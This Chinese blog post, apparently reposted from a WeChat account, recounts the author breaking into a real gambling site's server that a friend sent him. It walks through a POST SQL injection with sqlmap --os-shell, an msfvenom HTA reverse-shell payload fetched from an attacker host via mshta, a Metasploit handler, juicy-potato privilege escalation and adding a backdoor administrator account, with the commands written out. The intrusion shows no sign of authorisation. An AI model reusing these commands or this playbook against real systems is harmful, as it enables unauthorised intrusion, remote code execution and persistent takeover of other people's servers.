菜鸟提权拿下棋牌服务器

  • A+
所属分类:安全文章

菜鸟提权拿下棋牌服务器

菜鸟拿下棋牌服务器今天一个伙伴发来给棋牌后台,让我看看能不能拿下没啥技术含量,大牛莫笑!!!


菜鸟提权拿下棋牌服务器

菜鸟提权拿下棋牌服务器


开发现是个网狐棋牌站
这网站默认用户是admin密码是123456
尝试这弱口令不对,不过这系统还有个小day,就是post注入
打开burp+火狐


菜鸟提权拿下棋牌服务器

咱们在这个userName=admin后面这个*号。让sqlmap帮我们跑!
sqlmap -r /root/bc.txt --os-shell
一路回车


菜鸟提权拿下棋牌服务器


看下权限是


菜鸟提权拿下棋牌服务器


没关系。反弹个shell到msf
用msfVENOM -p windows/meterpreter/reverse_tcp lhost=msf主机ip lport=监听端口 -f hta-psh -o test.hta
生成一个hta马

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 你的msfIP
set LPORT 监听的端口
run

在sqlmap执行mshta http://木马地址/test.hta


菜鸟提权拿下棋牌服务器

拿到shell了就看能不能提权了
meterpreter > getuid
Server username: NT ServiceMSSQLSERVER
meterpreter > sysinfo
Computer : **************
OS : Windows 2008 R2 (6.1 Build 7601, Service Pack 1).
Architecture : x64
System Language : zh_CN
Domain : ***************
Logged On Users : 1
Meterpreter : x86/windows
meterpreter >shell
执行systeminfo


菜鸟提权拿下棋牌服务器


打了44个补丁。应该能拿下来
利用提权辅助网查看一下,用potato来试试


菜鸟提权拿下棋牌服务器


回到meterpreter把反弹回来的shell先放后台 background
C:Windowssystem32>exit
meterpreter > background
Backgrounding session 5...
msf5 exploit(multi/handler) >

use exploit/windows/local/ms16_075_reflection_juicy
set session 5
set lport 4433  //如果你的监听端口不是4444那你就要用这命令来设置端口
接着直接执行 exploit


菜鸟提权拿下棋牌服务器


Ok,利用成功!
Getsystem


菜鸟提权拿下棋牌服务器


接下来都懂的了net user admin admin /add net localgroup admministrators admin /add


菜鸟提权拿下棋牌服务器


菜鸟提权拿下棋牌服务器

菜鸟提权拿下棋牌服务器

本文始发于微信公众号(疯猫网络):菜鸟提权拿下棋牌服务器

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: